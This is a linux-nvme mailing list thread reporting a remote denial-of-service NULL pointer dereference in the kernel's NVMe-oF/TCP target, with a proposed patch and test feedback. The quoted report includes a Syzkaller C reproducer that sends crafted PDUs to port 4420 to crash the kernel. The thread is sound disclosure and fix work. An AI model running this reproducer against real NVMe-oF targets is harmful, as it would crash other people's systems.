once I setup a target with nvmeof TCP and run the above program :-

[22180.507777] nvmet_tcp: failed to allocate queue, error -107

Can you try following patch? full disclosure I've compile tested
and built this patch based on code inspection only :-

diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
index 92b74d0b8686..e35e8d79c66a 100644
--- a/drivers/nvme/target/tcp.c
+++ b/drivers/nvme/target/tcp.c
@@ -992,12 +992,26 @@ static int nvmet_tcp_handle_h2c_data_pdu(struct 
nvmet_tcp_queue *queue)
         }

         if (le32_to_cpu(data->data_offset) != cmd->rbytes_done) {
+               struct nvme_command *nvme_cmd = &queue->pdu.cmd.cmd;
+               struct nvmet_req *req = &cmd->req;
+
                 pr_err("ttag %u unexpected data offset %u (expected %u)\n",
                         data->ttag, le32_to_cpu(data->data_offset),
                         cmd->rbytes_done);
-               /* FIXME: use path and transport errors */
-               nvmet_req_complete(&cmd->req,
-                       NVME_SC_INVALID_FIELD | NVME_SC_DNR);
+
+               memcpy(req->cmd, nvme_cmd, sizeof(*nvme_cmd));
+               if (unlikely(!nvmet_req_init(req, &queue->nvme_cq,
+                               &queue->nvme_sq, &nvmet_tcp_ops))) {
+                       pr_err("failed cmd %p id %d opcode %d, data_len: 
%d\n",
+                               req->cmd, req->cmd->common.command_id,
+                               req->cmd->common.opcode,
+ le32_to_cpu(req->cmd->common.dptr.sgl.length));
+                       nvmet_tcp_handle_req_failure(queue, cmd, req);
+               } else {
+                       /* FIXME: use path and transport errors */
+                       nvmet_req_complete(&cmd->req,
+                                       NVME_SC_INVALID_FIELD | 
NVME_SC_DNR);
+               }
                 return -EPROTO;
         }

I'll try to reproduce these problems, else will ping you offline...

-ck

[1]
nvme (nvme-6.7) # nvme list
Node                  Generic               SN 
Model                                    Namespace 
Usage                      Format           FW Rev
--------------------- --------------------- -------------------- 
---------------------------------------- --------- 
-------------------------- ---------------- --------
/dev/nvme1n1          /dev/ng1n1            408a5a6db1e890944886 
Linux                                    1           1.07  GB / 1.07  
GB    512   B +  0 B   6.6.0nvm
/dev/nvme0n1          /dev/ng0n1            foo QEMU NVMe 
Ctrl                           1           1.07  GB / 1.07  GB    512   
B +  0 B   1.0
nvme (nvme-6.7) # cat /sys/kernel/config/nvmet/ports/0/addr_trtype
tcp
nvme (nvme-6.7) # cat /sys/kernel/config/nvmet/ports/0/addr_traddr
127.0.0.1
nvme (nvme-6.7) # ./a.out
nvme (nvme-6.7) # dmesg  -c
[22106.230605] loop: module loaded
[22106.246494] run blktests nvme/004 at 2023-11-07 01:58:06
[22106.279272] loop0: detected capacity change from 0 to 2097152
[22106.294374] nvmet: adding nsid 1 to subsystem blktests-subsystem-1
[22106.302392] nvmet_tcp: enabling port 0 (127.0.0.1:4420)
[22106.320146] nvmet: creating nvm controller 1 for subsystem 
blktests-subsystem-1 for NQN 
nqn.2014-08.org.nvmexpress:uuid:0f01fb42-9f7f-4856-b0b3-51e60b8de349.
[22106.320859] nvme nvme1: creating 48 I/O queues.
[22106.326035] nvme nvme1: mapped 48/0/0 default/read/poll queues.
[22106.336551] nvme nvme1: new ctrl: NQN "blktests-subsystem-1", addr 
127.0.0.1:4420
[22180.507777] nvmet_tcp: failed to allocate queue, error -107



^ permalink raw reply related	[flat|nested] 6+ messages in thread

* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete`
  2023-11-07 10:03 ` Chaitanya Kulkarni
@ 2023-11-09 13:17   ` Alon Zahavi
  2023-11-15  9:02     ` Alon Zahavi
  2023-11-20 10:56   ` Sagi Grimberg
  1 sibling, 1 reply; 6+ messages in thread
From: Alon Zahavi @ 2023-11-09 13:17 UTC (permalink / raw)
  To: Chaitanya Kulkarni; +Cc: linux-nvme, Sagi Grimberg, Christoph Hellwig

On Tue, 7 Nov 2023 at 12:03, Chaitanya Kulkarni <chaitanyak@nvidia.com> wrote:
>
> On 11/6/23 05:41, Alon Zahavi wrote:
> > # Bug Overview
> >
> > ## The Bug
> > A null-ptr-deref in `__nvmet_req_complete`.
> >
> > ## Bug Location
> > `drivers/nvme/target/core.c` in the function `__nvmet_req_complete`.
> >
> > ## Bug Class
> > Remote Denial of Service
> >
> > ## Disclaimer:
> > This bug was found using Syzkaller with NVMe-oF/TCP added support.
> >
> > # Technical Details
> >
> > ## Kernel Report - NULL Pointer Dereference
> >
> > BUG: kernel NULL pointer dereference, address: 0000000000000020
> > #PF: supervisor read access in kernel mode
> > #PF: error_code(0x0000) - not-present page
> > PGD 0 P4D 0
> > Oops: 0000 [#1] PREEMPT SMP NOPTI
> > CPU: 2 PID: 31 Comm: kworker/2:0H Kdump: loaded Not tainted 6.5.0-rc1+ #5
> > Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
> > Reference Platform, BIOS 6.00 11/12/2020
> > Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> > RIP: 0010:__nvmet_req_complete+0x33/0x350 drivers/nvme/target/core.c:740
> > Code: 41 57 41 56 41 55 41 54 49 89 fc 53 89 f3 48 83 ec 08 66 89 75
> > d6 e8 dc cd 1a ff 4d 8b 6c 24 10 bf 01 00 00 00 4d 8b 74 24 20 <45> 0f
> > b6 7d 20 44 89 fe e8 60 c8 1a ff 41 80 ff 01 0f 87 ef 75 96
> > RSP: 0018:ffffc90000527c00 EFLAGS: 00010293
> > RAX: 0000000000000000 RBX: 0000000000004002 RCX: 0000000000000000
> > RDX: ffff888100c74880 RSI: ffffffff82170d04 RDI: 0000000000000001
> > RBP: ffffc90000527c30 R08: 0000000000000001 R09: 0000000000000000
> > R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881292a13e8
> > R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
> > FS:  0000000000000000(0000) GS:ffff888233f00000(0000) knlGS:0000000000000000
> > CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> > CR2: 0000000000000020 CR3: 0000000003c6a005 CR4: 00000000007706e0
> > PKRU: 55555554
> > Call Trace:
> >   <TASK>
> >   nvmet_req_complete+0x2c/0x40 drivers/nvme/target/core.c:761
> >   nvmet_tcp_handle_h2c_data_pdu drivers/nvme/target/tcp.c:981
> >   nvmet_tcp_done_recv_pdu drivers/nvme/target/tcp.c:1020
> >   nvmet_tcp_try_recv_pdu+0x1132/0x1310 drivers/nvme/target/tcp.c:1182
> >   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1306
> >   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338
> >   nvmet_tcp_io_work+0xe6/0xd90 drivers/nvme/target/tcp.c:1388
> >   process_one_work+0x3da/0x870 kernel/workqueue.c:2597
> >   worker_thread+0x67/0x640 kernel/workqueue.c:2748
> >   kthread+0x164/0x1b0 kernel/kthread.c:389
> >   ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
> >   </TASK>
> >
> > ## Description
> >
> > ### Tracing The Bug
> > The bug occurs during the execution of __nvmet_req_complete. Looking
> > in the report generated by syzkaller, we can see the exact line of
> > code that triggers the bug.
> >
> > Code Block 1:
> > ```
> > static void __nvmet_req_complete(struct nvmet_req *req, u16 status)
> > {
> > struct nvmet_ns *ns = req->ns;
> >
> > if (!req->sq->sqhd_disabled) // 1
> > nvmet_update_sq_head(req);
> >
> >    ..
> > }
> > ```
> >
> > In the first code block, we can see that there is a dereference of
> > `req->sq` when checking the condition `if (!req->sq->sqhd_disabled)`.
> > However, when executing the reproducer, `req->sq` is NULL. When trying
> > to dereference it, the kernel triggers a panic.
> >
> > ## Root Cause
> > `req` is initialized during `nvmet_req_init`. However, the sequence
> > that leads into `__nvmet_req_complete` does not contain any call for
> > `nvmet_req_init`, thus crashing the kernel with NULL pointer
> > dereference. This flow of execution can also create a situation where
> > an uninitialized memory address will be dereferenced, which has
> > undefined behaviour.
> >
> > ## Reproducer
> > I am adding a reproducer generated by Syzkaller with some
> > optimizations and minor changes.
> >
> > ```
> > // autogenerated by syzkaller (<https://github.com/google/syzkaller>)
> >
> > #define _GNU_SOURCE
> >
> > #include <endian.h>
> > #include <errno.h>
> > #include <fcntl.h>
> > #include <sched.h>
> > #include <stdarg.h>
> > #include <stdbool.h>
> > #include <stdint.h>
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <string.h>
> > #include <sys/mount.h>
> > #include <sys/prctl.h>
> > #include <sys/resource.h>
> > #include <sys/stat.h>
> > #include <sys/syscall.h>
> > #include <sys/time.h>
> > #include <sys/types.h>
> > #include <sys/wait.h>
> > #include <unistd.h>
> >
> > #include <linux/capability.h>
> >
> > uint64_t r[1] = {0xffffffffffffffff};
> >
> > void loop(void)
> > {
> >    intptr_t res = 0;
> >    res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
> >    if (res != -1)
> >      r[0] = res;
> >    *(uint16_t*)0x20000100 = 2;
> >    *(uint16_t*)0x20000102 = htobe16(0x1144);
> >    *(uint32_t*)0x20000104 = htobe32(0x7f000001);
> >    syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
> >    *(uint8_t*)0x200001c0 = 0;
> >    *(uint8_t*)0x200001c1 = 0;
> >    *(uint8_t*)0x200001c2 = 0x80;
> >    *(uint8_t*)0x200001c3 = 0;
> >    *(uint32_t*)0x200001c4 = 0x80;
> >    *(uint16_t*)0x200001c8 = 0;
> >    *(uint8_t*)0x200001ca = 0;
> >    *(uint8_t*)0x200001cb = 0;
> >    *(uint32_t*)0x200001cc = 0;
> >    memcpy((void*)0x200001d0,
> >           "\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf"
> >           "\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf"
> >           "\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35"
> >           "\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86"
> >           "\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf"
> >           "\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf"
> >           "\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86",
> >           112);
> >    syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
> >            /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
> >    *(uint8_t*)0x20000080 = 6;
> >    *(uint8_t*)0x20000081 = 3;
> >    *(uint8_t*)0x20000082 = 0x18;
> >    *(uint8_t*)0x20000083 = 0x1c;
> >    *(uint32_t*)0x20000084 = 2;
> >    *(uint16_t*)0x20000088 = 0x5d;
> >    *(uint16_t*)0x2000008a = 3;
> >    *(uint32_t*)0x2000008c = 0;
> >    *(uint32_t*)0x20000090 = 7;
> >    memcpy((void*)0x20000094, "\\x83\\x9e\\x4f\\x1a", 4);
> >    syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x20000080ul, /*len=*/0x80ul,
> >            /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
> > }
> > int main(void)
> > {
> >    syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
> >            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
> >    syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
> >            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
> >    syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
> >            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
> >    loop();
> >    return 0;
> > }
> > ```
> >
> >
>
>
> I'm not able to reproduce the problem [1], all I get is following error
> once I setup a target with nvmeof TCP and run the above program :-
>
> [22180.507777] nvmet_tcp: failed to allocate queue, error -107
>
> Can you try following patch? full disclosure I've compile tested
> and built this patch based on code inspection only :-
>
> diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
> index 92b74d0b8686..e35e8d79c66a 100644
> --- a/drivers/nvme/target/tcp.c
> +++ b/drivers/nvme/target/tcp.c
> @@ -992,12 +992,26 @@ static int nvmet_tcp_handle_h2c_data_pdu(struct
> nvmet_tcp_queue *queue)
>          }
>
>          if (le32_to_cpu(data->data_offset) != cmd->rbytes_done) {
> +               struct nvme_command *nvme_cmd = &queue->pdu.cmd.cmd;
> +               struct nvmet_req *req = &cmd->req;
> +
>                  pr_err("ttag %u unexpected data offset %u (expected %u)\n",
>                          data->ttag, le32_to_cpu(data->data_offset),
>                          cmd->rbytes_done);
> -               /* FIXME: use path and transport errors */
> -               nvmet_req_complete(&cmd->req,
> -                       NVME_SC_INVALID_FIELD | NVME_SC_DNR);
> +
> +               memcpy(req->cmd, nvme_cmd, sizeof(*nvme_cmd));
> +               if (unlikely(!nvmet_req_init(req, &queue->nvme_cq,
> +                               &queue->nvme_sq, &nvmet_tcp_ops))) {
> +                       pr_err("failed cmd %p id %d opcode %d, data_len:
> %d\n",
> +                               req->cmd, req->cmd->common.command_id,
> +                               req->cmd->common.opcode,
> + le32_to_cpu(req->cmd->common.dptr.sgl.length));
> +                       nvmet_tcp_handle_req_failure(queue, cmd, req);
> +               } else {
> +                       /* FIXME: use path and transport errors */
> +                       nvmet_req_complete(&cmd->req,
> +                                       NVME_SC_INVALID_FIELD |
> NVME_SC_DNR);
> +               }
>                  return -EPROTO;
>          }
>
> I'll try to reproduce these problems, else will ping you offline...
>
> -ck
>
> [1]
> nvme (nvme-6.7) # nvme list
> Node                  Generic               SN
> Model                                    Namespace
> Usage                      Format           FW Rev
> --------------------- --------------------- --------------------
> ---------------------------------------- ---------
> -------------------------- ---------------- --------
> /dev/nvme1n1          /dev/ng1n1            408a5a6db1e890944886
> Linux                                    1           1.07  GB / 1.07
> GB    512   B +  0 B   6.6.0nvm
> /dev/nvme0n1          /dev/ng0n1            foo QEMU NVMe
> Ctrl                           1           1.07  GB / 1.07  GB    512
> B +  0 B   1.0
> nvme (nvme-6.7) # cat /sys/kernel/config/nvmet/ports/0/addr_trtype
> tcp
> nvme (nvme-6.7) # cat /sys/kernel/config/nvmet/ports/0/addr_traddr
> 127.0.0.1
> nvme (nvme-6.7) # ./a.out
> nvme (nvme-6.7) # dmesg  -c
> [22106.230605] loop: module loaded
> [22106.246494] run blktests nvme/004 at 2023-11-07 01:58:06
> [22106.279272] loop0: detected capacity change from 0 to 2097152
> [22106.294374] nvmet: adding nsid 1 to subsystem blktests-subsystem-1
> [22106.302392] nvmet_tcp: enabling port 0 (127.0.0.1:4420)
> [22106.320146] nvmet: creating nvm controller 1 for subsystem
> blktests-subsystem-1 for NQN
> nqn.2014-08.org.nvmexpress:uuid:0f01fb42-9f7f-4856-b0b3-51e60b8de349.
> [22106.320859] nvme nvme1: creating 48 I/O queues.
> [22106.326035] nvme nvme1: mapped 48/0/0 default/read/poll queues.
> [22106.336551] nvme nvme1: new ctrl: NQN "blktests-subsystem-1", addr
> 127.0.0.1:4420
> [22180.507777] nvmet_tcp: failed to allocate queue, error -107
>
>

I tested the patch and it does mitigate the problem.

Thanks,
Alon.


^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete`
  2023-11-09 13:17   ` Alon Zahavi
@ 2023-11-15  9:02     ` Alon Zahavi
  0 siblings, 0 replies; 6+ messages in thread
From: Alon Zahavi @ 2023-11-15  9:02 UTC (permalink / raw)
  To: Chaitanya Kulkarni; +Cc: linux-nvme, Sagi Grimberg, Christoph Hellwig

On Thu, 9 Nov 2023 at 15:17, Alon Zahavi <zahavi.alon@gmail.com> wrote:
>
> On Tue, 7 Nov 2023 at 12:03, Chaitanya Kulkarni <chaitanyak@nvidia.com> wrote:
> >
> > On 11/6/23 05:41, Alon Zahavi wrote:
> > > # Bug Overview
> > >
> > > ## The Bug
> > > A null-ptr-deref in `__nvmet_req_complete`.
> > >
> > > ## Bug Location
> > > `drivers/nvme/target/core.c` in the function `__nvmet_req_complete`.
> > >
> > > ## Bug Class
> > > Remote Denial of Service
> > >
> > > ## Disclaimer:
> > > This bug was found using Syzkaller with NVMe-oF/TCP added support.
> > >
> > > # Technical Details
> > >
> > > ## Kernel Report - NULL Pointer Dereference
> > >
> > > BUG: kernel NULL pointer dereference, address: 0000000000000020
> > > #PF: supervisor read access in kernel mode
> > > #PF: error_code(0x0000) - not-present page
> > > PGD 0 P4D 0
> > > Oops: 0000 [#1] PREEMPT SMP NOPTI
> > > CPU: 2 PID: 31 Comm: kworker/2:0H Kdump: loaded Not tainted 6.5.0-rc1+ #5
> > > Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop
> > > Reference Platform, BIOS 6.00 11/12/2020
> > > Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
> > > RIP: 0010:__nvmet_req_complete+0x33/0x350 drivers/nvme/target/core.c:740
> > > Code: 41 57 41 56 41 55 41 54 49 89 fc 53 89 f3 48 83 ec 08 66 89 75
> > > d6 e8 dc cd 1a ff 4d 8b 6c 24 10 bf 01 00 00 00 4d 8b 74 24 20 <45> 0f
> > > b6 7d 20 44 89 fe e8 60 c8 1a ff 41 80 ff 01 0f 87 ef 75 96
> > > RSP: 0018:ffffc90000527c00 EFLAGS: 00010293
> > > RAX: 0000000000000000 RBX: 0000000000004002 RCX: 0000000000000000
> > > RDX: ffff888100c74880 RSI: ffffffff82170d04 RDI: 0000000000000001
> > > RBP: ffffc90000527c30 R08: 0000000000000001 R09: 0000000000000000
> > > R10: 0000000000000000 R11: 0000000000000000 R12: ffff8881292a13e8
> > > R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
> > > FS:  0000000000000000(0000) GS:ffff888233f00000(0000) knlGS:0000000000000000
> > > CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> > > CR2: 0000000000000020 CR3: 0000000003c6a005 CR4: 00000000007706e0
> > > PKRU: 55555554
> > > Call Trace:
> > >   <TASK>
> > >   nvmet_req_complete+0x2c/0x40 drivers/nvme/target/core.c:761
> > >   nvmet_tcp_handle_h2c_data_pdu drivers/nvme/target/tcp.c:981
> > >   nvmet_tcp_done_recv_pdu drivers/nvme/target/tcp.c:1020
> > >   nvmet_tcp_try_recv_pdu+0x1132/0x1310 drivers/nvme/target/tcp.c:1182
> > >   nvmet_tcp_try_recv_one drivers/nvme/target/tcp.c:1306
> > >   nvmet_tcp_try_recv drivers/nvme/target/tcp.c:1338
> > >   nvmet_tcp_io_work+0xe6/0xd90 drivers/nvme/target/tcp.c:1388
> > >   process_one_work+0x3da/0x870 kernel/workqueue.c:2597
> > >   worker_thread+0x67/0x640 kernel/workqueue.c:2748
> > >   kthread+0x164/0x1b0 kernel/kthread.c:389
> > >   ret_from_fork+0x29/0x50 arch/x86/entry/entry_64.S:308
> > >   </TASK>
> > >
> > > ## Description
> > >
> > > ### Tracing The Bug
> > > The bug occurs during the execution of __nvmet_req_complete. Looking
> > > in the report generated by syzkaller, we can see the exact line of
> > > code that triggers the bug.
> > >
> > > Code Block 1:
> > > ```
> > > static void __nvmet_req_complete(struct nvmet_req *req, u16 status)
> > > {
> > > struct nvmet_ns *ns = req->ns;
> > >
> > > if (!req->sq->sqhd_disabled) // 1
> > > nvmet_update_sq_head(req);
> > >
> > >    ..
> > > }
> > > ```
> > >
> > > In the first code block, we can see that there is a dereference of
> > > `req->sq` when checking the condition `if (!req->sq->sqhd_disabled)`.
> > > However, when executing the reproducer, `req->sq` is NULL. When trying
> > > to dereference it, the kernel triggers a panic.
> > >
> > > ## Root Cause
> > > `req` is initialized during `nvmet_req_init`. However, the sequence
> > > that leads into `__nvmet_req_complete` does not contain any call for
> > > `nvmet_req_init`, thus crashing the kernel with NULL pointer
> > > dereference. This flow of execution can also create a situation where
> > > an uninitialized memory address will be dereferenced, which has
> > > undefined behaviour.
> > >
> > > ## Reproducer
> > > I am adding a reproducer generated by Syzkaller with some
> > > optimizations and minor changes.
> > >
> > > ```
> > > // autogenerated by syzkaller (<https://github.com/google/syzkaller>)
> > >
> > > #define _GNU_SOURCE
> > >
> > > #include <endian.h>
> > > #include <errno.h>
> > > #include <fcntl.h>
> > > #include <sched.h>
> > > #include <stdarg.h>
> > > #include <stdbool.h>
> > > #include <stdint.h>
> > > #include <stdio.h>
> > > #include <stdlib.h>
> > > #include <string.h>
> > > #include <sys/mount.h>
> > > #include <sys/prctl.h>
> > > #include <sys/resource.h>
> > > #include <sys/stat.h>
> > > #include <sys/syscall.h>
> > > #include <sys/time.h>
> > > #include <sys/types.h>
> > > #include <sys/wait.h>
> > > #include <unistd.h>
> > >
> > > #include <linux/capability.h>
> > >
> > > uint64_t r[1] = {0xffffffffffffffff};
> > >
> > > void loop(void)
> > > {
> > >    intptr_t res = 0;
> > >    res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
> > >    if (res != -1)
> > >      r[0] = res;
> > >    *(uint16_t*)0x20000100 = 2;
> > >    *(uint16_t*)0x20000102 = htobe16(0x1144);
> > >    *(uint32_t*)0x20000104 = htobe32(0x7f000001);
> > >    syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
> > >    *(uint8_t*)0x200001c0 = 0;
> > >    *(uint8_t*)0x200001c1 = 0;
> > >    *(uint8_t*)0x200001c2 = 0x80;
> > >    *(uint8_t*)0x200001c3 = 0;
> > >    *(uint32_t*)0x200001c4 = 0x80;
> > >    *(uint16_t*)0x200001c8 = 0;
> > >    *(uint8_t*)0x200001ca = 0;
> > >    *(uint8_t*)0x200001cb = 0;
> > >    *(uint32_t*)0x200001cc = 0;
> > >    memcpy((void*)0x200001d0,
> > >           "\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf"
> > >           "\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf"
> > >           "\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35"
> > >           "\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86"
> > >           "\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf"
> > >           "\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf"
> > >           "\\x35\\x86\\xcf\\xbf\\x35\\x86\\xcf\\xbf\\x35\\x86",
> > >           112);
> > >    syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
> > >            /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
> > >    *(uint8_t*)0x20000080 = 6;
> > >    *(uint8_t*)0x20000081 = 3;
> > >    *(uint8_t*)0x20000082 = 0x18;
> > >    *(uint8_t*)0x20000083 = 0x1c;
> > >    *(uint32_t*)0x20000084 = 2;
> > >    *(uint16_t*)0x20000088 = 0x5d;
> > >    *(uint16_t*)0x2000008a = 3;
> > >    *(uint32_t*)0x2000008c = 0;
> > >    *(uint32_t*)0x20000090 = 7;
> > >    memcpy((void*)0x20000094, "\\x83\\x9e\\x4f\\x1a", 4);
> > >    syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x20000080ul, /*len=*/0x80ul,
> > >            /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
> > > }
> > > int main(void)
> > > {
> > >    syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
> > >            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
> > >    syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
> > >            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
> > >    syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
> > >            /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
> > >    loop();
> > >    return 0;
> > > }
> > > ```
> > >
> > >
> >
> >
> > I'm not able to reproduce the problem [1], all I get is following error
> > once I setup a target with nvmeof TCP and run the above program :-
> >
> > [22180.507777] nvmet_tcp: failed to allocate queue, error -107
> >
> > Can you try following patch? full disclosure I've compile tested
> > and built this patch based on code inspection only :-
> >
> > diff --git a/drivers/nvme/target/tcp.c b/drivers/nvme/target/tcp.c
> > index 92b74d0b8686..e35e8d79c66a 100644
> > --- a/drivers/nvme/target/tcp.c
> > +++ b/drivers/nvme/target/tcp.c
> > @@ -992,12 +992,26 @@ static int nvmet_tcp_handle_h2c_data_pdu(struct
> > nvmet_tcp_queue *queue)
> >          }
> >
> >          if (le32_to_cpu(data->data_offset) != cmd->rbytes_done) {
> > +               struct nvme_command *nvme_cmd = &queue->pdu.cmd.cmd;
> > +               struct nvmet_req *req = &cmd->req;
> > +
> >                  pr_err("ttag %u unexpected data offset %u (expected %u)\n",
> >                          data->ttag, le32_to_cpu(data->data_offset),
> >                          cmd->rbytes_done);
> > -               /* FIXME: use path and transport errors */
> > -               nvmet_req_complete(&cmd->req,
> > -                       NVME_SC_INVALID_FIELD | NVME_SC_DNR);
> > +
> > +               memcpy(req->cmd, nvme_cmd, sizeof(*nvme_cmd));
> > +               if (unlikely(!nvmet_req_init(req, &queue->nvme_cq,
> > +                               &queue->nvme_sq, &nvmet_tcp_ops))) {
> > +                       pr_err("failed cmd %p id %d opcode %d, data_len:
> > %d\n",
> > +                               req->cmd, req->cmd->common.command_id,
> > +                               req->cmd->common.opcode,
> > + le32_to_cpu(req->cmd->common.dptr.sgl.length));
> > +                       nvmet_tcp_handle_req_failure(queue, cmd, req);
> > +               } else {
> > +                       /* FIXME: use path and transport errors */
> > +                       nvmet_req_complete(&cmd->req,
> > +                                       NVME_SC_INVALID_FIELD |
> > NVME_SC_DNR);
> > +               }
> >                  return -EPROTO;
> >          }
> >
> > I'll try to reproduce these problems, else will ping you offline...
> >
> > -ck
> >
> > [1]
> > nvme (nvme-6.7) # nvme list
> > Node                  Generic               SN
> > Model                                    Namespace
> > Usage                      Format           FW Rev
> > --------------------- --------------------- --------------------
> > ---------------------------------------- ---------
> > -------------------------- ---------------- --------
> > /dev/nvme1n1          /dev/ng1n1            408a5a6db1e890944886
> > Linux                                    1           1.07  GB / 1.07
> > GB    512   B +  0 B   6.6.0nvm
> > /dev/nvme0n1          /dev/ng0n1            foo QEMU NVMe
> > Ctrl                           1           1.07  GB / 1.07  GB    512
> > B +  0 B   1.0
> > nvme (nvme-6.7) # cat /sys/kernel/config/nvmet/ports/0/addr_trtype
> > tcp
> > nvme (nvme-6.7) # cat /sys/kernel/config/nvmet/ports/0/addr_traddr
> > 127.0.0.1
> > nvme (nvme-6.7) # ./a.out
> > nvme (nvme-6.7) # dmesg  -c
> > [22106.230605] loop: module loaded
> > [22106.246494] run blktests nvme/004 at 2023-11-07 01:58:06
> > [22106.279272] loop0: detected capacity change from 0 to 2097152
> > [22106.294374] nvmet: adding nsid 1 to subsystem blktests-subsystem-1
> > [22106.302392] nvmet_tcp: enabling port 0 (127.0.0.1:4420)
> > [22106.320146] nvmet: creating nvm controller 1 for subsystem
> > blktests-subsystem-1 for NQN
> > nqn.2014-08.org.nvmexpress:uuid:0f01fb42-9f7f-4856-b0b3-51e60b8de349.
> > [22106.320859] nvme nvme1: creating 48 I/O queues.
> > [22106.326035] nvme nvme1: mapped 48/0/0 default/read/poll queues.
> > [22106.336551] nvme nvme1: new ctrl: NQN "blktests-subsystem-1", addr
> > 127.0.0.1:4420
> > [22180.507777] nvmet_tcp: failed to allocate queue, error -107
> >
> >
>
> I tested the patch and it does mitigate the problem.
>
> Thanks,
> Alon.

Checking if there's any update regarding the patch.


^ permalink raw reply	[flat|nested] 6+ messages in thread

* Re: [Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `__nvmet_req_complete`
  2023-11-07 10:03 ` Chaitanya Kulkarni
  2023-11-09 13:17   ` Alon Zahavi
@ 2023-11-20 10:56   ` Sagi Grimberg
  1 sibling, 0 replies; 6+ messages in thread
From: Sagi Grimberg @ 2023-11-20 10:56 UTC (permalink / raw)
  To: Chaitanya Kulkarni, Alon Zahavi, linux-nvme; +Cc: Christoph Hellwig



On 11/7/23 12:03, Chaitanya Kulkarni wrote:
> On 11/6/23 05:41, Alon Zahavi wrote:
>> # Bug Overview
>>
>> ## The Bug
>> A null-ptr-deref in `__nvmet_req_complete`.
>>
>> ## Bug Location
>> `drivers/nvme/target/core.c` in the function `__nvmet_req_complete`.
>>
>> ## Bug Class
>> Remote Denial of Service
>>
>> ## Disclaimer:
>> This bug was found using Syzkaller with NVMe-oF/TCP added support.
>>
>> # Technical Details
>>
>> ## Kernel Report - NULL Pointer Dereference
>>
>> BUG: kernel NULL pointer dereference, address: 0000000000000020
>> #PF: supervisor read access in kernel mode
